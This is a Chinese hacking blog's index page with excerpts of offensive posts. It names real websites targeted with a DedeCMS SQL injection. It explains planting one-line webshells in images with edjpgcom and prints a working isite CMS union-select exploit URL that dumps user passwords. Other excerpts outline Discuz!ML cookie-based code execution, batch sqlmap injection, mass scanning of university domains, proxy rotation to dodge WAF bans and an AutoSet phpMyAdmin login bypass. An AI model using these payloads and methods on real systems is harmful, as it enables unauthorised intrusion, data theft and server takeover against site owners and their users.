织梦cms注入漏洞

小俊 | WEB漏洞大全 | 2020-03-24
网上已经有几篇这样的文章了,当然我也是汇总了一些方法,并非原创。这个0day注入漏洞是1月份爆出来的,立马有人写出了利用方法。当然,渗透之路并非一番风顺,dede的安全防护做的也很好,所以成功与否仍然还是要看运气。     测试的是这两个网站:http://www.bianminxueche.com/ 和 http://www.newflash.tv/ ,利 [阅读全文]
ė113次浏览 60条评论 0

图片插入一句话工具

小俊 | 黑帽软件 | 2020-03-24
edjpgcom是一个很精巧强悍的小工具!   主要功能是能在图片里插入一句话马或者小马,伪造的比较好。 edjpgcom使用方法: 打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可。 如:下图写入一句话马。 [阅读全文]
ė128次浏览 60条评论 0

isite Cms SQL injection vulnerability exists

小俊 | WEB漏洞大全 | 2020-03-24
isite Cms Exp: index.php/iss/search/search/24%20and%201=2%20union%20select%201,name,3,4,5,6,7,password,9,10%20from%20flexi_user [阅读全文]
ė75次浏览 60条评论 0

Discuz!ML v.3.X存在代码注入漏洞

小俊 | WEB漏洞大全 | 2020-03-24
漏洞简述 Discuz! ML存在任意代码执行漏洞。该漏洞存在于请求流量中的cookie参数中的language字段,攻击者能够利用该漏洞在请求流量的cookie字段中(language参数)插入任意代码,最终执行任意代码,从而实现完全远程接管整个服务器的目的,该漏洞利用方式简单,危害性较大。 影响范围 Discuz!ML v.3.4 Di [阅读全文]
ė139次浏览 60条评论 0

批量注入的方法-python3和sqlmap

小俊 | 渗透测试 | 2020-03-22
注入一直都是用sqlmap 导致本来就不怎么精通的手工注入现在就忘的一干二净 想实战练习 却一时又找不到有注入的网站 于是便有了这篇文章 想找个批量获取域名链接的工具 但都是只是获取域名而已 都没获取后面的参数 于是自己写了个 只获取bing前10页的结果 输入q 结束循环 并开始整理数据 #!/usr/bin/env python # -*- conding [阅读全文]
ė87次浏览 60条评论 0

批量刷edusrc的方法

小俊 | 渗透测试 | 2020-03-22
首先我们用taoman来收集一下全国高校的子域名 使用命令: python taoman.py -f data/edusrc_school_domains.txt 复制代码 然后等它完成就可以了 这里其实是用的爆破子域名 edusrc_school_doma [阅读全文]
ė550次浏览 60条评论 0

PHP学习笔记

小俊 | 渗透测试 | 2020-03-21
个人的PHP学习笔记,有什么错误,还请师傅们指点 基础 语法 PHP 脚本以开始?>结束,同C语言一样,每个语句以分号结尾. echo "hello world"; [阅读全文]
ė89次浏览 60条评论 0

Mysql学习笔记

小俊 | 渗透测试 | 2020-03-21
个人的学习笔记,如有什么错误请师傅们指点 库 创建数据库 create database 数据库名 create database 数据库名 character set 编码 create database forever404 create database [阅读全文]
ė81次浏览 60条评论 0

sql注入时,把网站注入死或被waf拦截ip的问题解决方法

小俊 | 渗透测试 | 2020-03-21
 sql注入时,把网站注入死或被waf拦截ip的问题是不是很操蛋 旋转的代理服务器 1。爬行公共代理列表从互联网和另存为一个列表。 2。提供一个本地HTTP代理接口,转发你的每个请求都通过不同的HTTP代理 可能是有用的“搭桥”从网站禁止IP防火墙吗 usage: RPS.py [-h] [--ip IP] [--port PORT] [--page PAG [阅读全文]
ė65次浏览 60条评论 0

韩国AutoSet建站程序漏洞0day

小俊 | WEB漏洞大全 | 2020-03-21
 任意用户名密码登录 phpmyadmin登录账号密码随意输入登录 select @@basedir; //查看Mysql路径  CREATE TABLE `test` ( `c` varchar(255) DEFAULT NULL ) ENGINE=InnoDB DEFAULT CHARSET=utf8 //建立test用户和test表  LOAD DA [阅读全文]
ė107次浏览 60条评论 0

Ɣ回顶部